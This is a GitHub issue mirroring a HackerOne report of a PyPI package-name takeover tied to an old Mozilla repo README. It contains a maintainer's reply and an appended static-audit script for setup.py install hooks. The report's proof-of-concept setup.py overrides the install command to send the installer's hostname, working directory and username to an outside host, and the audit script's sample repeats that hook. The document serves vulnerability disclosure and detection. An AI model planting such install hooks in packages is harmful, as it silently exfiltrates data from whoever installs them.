
code injection through pip #418

Open
data-sync-user opened this issue Aug 7, 2023 · 1 comment
Labels: nosync (Keep this issue local to github)

Comments

data-sync-user (Collaborator):

HackerOne Report: https://hackerone.com/reports/2097694
Report Date: 2023-08-05 17:06:15 UTC
Reporter: anupamas01
Weakness: Code Injection

Initial Report:

Summary:

Hello team,
I found a pip package by which I can run malicious commands.

Steps To Reproduce:


  1. Go to https://github.com/mozilla-services/autopush-loadtester
    (as it is heavily used, I have not uploaded a higher version which may affect production)
  2. You can see `$ pip install ap-loadtester`; you can see I have taken it over at https://pypi.org/project/ap-loadtester/
    (in Maintainers). When you install it, it will install my pip package.

POC

https://pypi.org/project/ap-loadtester/

(Right now I am not uploading any code; if the program allows, I will upload it.)

from setuptools import setup
from setuptools.command.install import install
import requests
import socket
import getpass
import os

class CustomInstall(install):
    # Replaces the standard install command, so this runs on the
    # installing machine during `pip install`
    def run(self):
        install.run(self)
        hostname = socket.gethostname()
        cwd = os.getcwd()
        username = getpass.getuser()
        ploads = {'hostname': hostname, 'cwd': cwd, 'username': username}
        # replace burpcollaborator.net with Interactsh or pipedream
        requests.get("https://burpcollaborator.net", params=ploads)

setup(name='ap-loadtester',  # package name
      version='1.0.0',
      description='test',
      author='test',
      license='MIT',
      zip_safe=False,
      cmdclass={'install': CustomInstall})


Impact

code injection through the pip package

thanks
AnupamAs01





┆Issue is synchronized with this [Jira Bug](https://mozilla-hub.atlassian.net/browse/SYNC-3860)
┆Attachments: [F2576644] image.png (https://mozilla-hub.atlassian.net/rest/api/2/attachment/content/40617)
data-sync-user added the nosync label Aug 7, 2023
jrconlin (Member) commented Aug 7, 2023

Thank you for reporting this!

The repo you cite, autopush-loadtester, is a very old test script for the original autopush repo, which has been replaced by this repo. It was never meant to be installed by pip (and clearly so, because the setup.py would have created a differently named repo anyway. 🤦🏻‍♂️ )
I've corrected the README on the autopush-loadtester repo to remove references to ap-loadtester, as well as archived the repo.

Clearly, there are a lot of old bits and pieces lying around that have not yet been cleaned up properly. Thank you for helping us find one.
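As an added example (not code from the report, the reporter, or the autopush-loadtester project), the script below performs the two checks this thread points at. First, it parses a setup.py with `ast` to find `cmdclass` overrides of commands that run during `pip install` and lists which network, process or environment-discovery modules the hook class body references, which is the mechanism the PoC relies on. Second, it compares the `name=` declared in setup.py against whatever `pip install …` a README tells users to run, which is the mismatch described in the reply above: a README pointing at a PyPI name the project never owned leaves that name for anyone to register. The sample setup.py and README strings are constructed for this example and modelled on the report (the collector URL is a placeholder); they are only parsed, never executed, and the command and module lists are heuristics rather than an exhaustive catalogue.

```python
"""Static checks for a pip-installable project (added example, not project code)."""
import ast
import re

# Constructed sample setup.py modelled on the report's PoC; parsed here, never executed.
SAMPLE_SETUP_PY = '''
from setuptools import setup
from setuptools.command.install import install
import requests, socket, getpass, os

class CustomInstall(install):
    def run(self):
        install.run(self)
        ploads = {"hostname": socket.gethostname(), "cwd": os.getcwd(),
                  "username": getpass.getuser()}
        requests.get("https://example.invalid/collect", params=ploads)

setup(name="ap-loadtester", version="1.0.0", cmdclass={"install": CustomInstall})
'''

# Constructed benign setup.py whose declared name is not the one the README tells users to install.
SAMPLE_SETUP_PY_BENIGN = '''
from setuptools import setup
setup(name="autopush-loadtester", version="0.1")
'''

# Constructed README fragment carrying the install line quoted in the report.
SAMPLE_README = "Install the load tester with:\n\n    $ pip install ap-loadtester\n"

# Heuristics: setuptools commands that run during `pip install`, and modules an install hook has no business touching.
HOOK_COMMANDS = {"install", "develop", "egg_info", "build_py", "build_ext", "sdist", "bdist_wheel"}
SUSPICIOUS_MODULES = {"requests", "socket", "urllib", "http", "subprocess", "os", "getpass", "ctypes"}
PIP_INSTALL_RE = re.compile(r"pip3?\s+install\s+(?:-[-\w]+\s+)*([A-Za-z0-9][A-Za-z0-9._-]*)")


def _setup_call(tree):
    """The setup(...) call node, or None if the file never calls setup()."""
    for node in ast.walk(tree):
        if isinstance(node, ast.Call):
            func = node.func
            if (func.id if isinstance(func, ast.Name) else getattr(func, "attr", None)) == "setup":
                return node
    return None

def _keyword(call, key):
    """Value node of keyword argument `key` on a call node, or None."""
    return next((kw.value for kw in call.keywords if kw.arg == key), None) if call else None

def declared_name(setup_source):
    """The literal name= passed to setup(); None when absent or computed at runtime."""
    value = _keyword(_setup_call(ast.parse(setup_source)), "name")
    return value.value if isinstance(value, ast.Constant) and isinstance(value.value, str) else None

def install_hooks(setup_source):
    """Map each command overridden via cmdclass={...} to the class that implements it."""
    value = _keyword(_setup_call(ast.parse(setup_source)), "cmdclass")
    hooks = {}
    if isinstance(value, ast.Dict):
        for key, cls in zip(value.keys, value.values):
            if isinstance(key, ast.Constant) and isinstance(cls, ast.Name):
                hooks[key.value] = cls.id
    return hooks

def hook_uses(setup_source, class_name):
    """Suspicious top-level imports that the hook class body actually references."""
    tree = ast.parse(setup_source)
    imported = set()
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            imported.update(alias.name.split(".")[0] for alias in node.names)
        elif isinstance(node, ast.ImportFrom) and node.module:
            imported.add(node.module.split(".")[0])
    watch = imported & SUSPICIOUS_MODULES
    used = set()
    for node in ast.walk(tree):
        if isinstance(node, ast.ClassDef) and node.name == class_name:
            used.update(n.id for n in ast.walk(node) if isinstance(n, ast.Name) and n.id in watch)
    return used

def readme_install_names(readme_text):
    """Package names a README tells users to `pip install`."""
    return {m.group(1) for m in PIP_INSTALL_RE.finditer(readme_text)}

def _normalize(name):
    # PEP 503 style normalisation so Foo_Bar and foo-bar compare equal
    return re.sub(r"[-_.]+", "-", name).lower() if name else None

def audit(setup_source, readme_text):
    """Human-readable findings; an empty list means both checks passed."""
    findings = []
    name = declared_name(setup_source)
    for told in readme_install_names(readme_text):
        if _normalize(told) != _normalize(name):
            findings.append(f"README says 'pip install {told}' but setup.py declares name={name!r}; "
                            f"that PyPI name is not this project's and anyone may register it")
    for cmd, cls in install_hooks(setup_source).items():
        if cmd in HOOK_COMMANDS:
            uses = hook_uses(setup_source, cls)
            detail = f" and references {sorted(uses)}" if uses else ""
            findings.append(f"setup.py overrides the '{cmd}' command with class {cls}{detail}; "
                            f"that code runs on the installing machine during pip install")
    return findings
```

Run `audit(SAMPLE_SETUP_PY, SAMPLE_README)` to see the install-hook finding for the PoC-style file, and `audit(SAMPLE_SETUP_PY_BENIGN, SAMPLE_README)` to see the name-drift finding for a file that is harmless in itself but whose README sends users to an unowned PyPI name. The same two checks are cheap to run over a dependency before installing it: download the sdist, point `audit` at its setup.py, and treat any `cmdclass` override as something to read before letting pip execute it.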
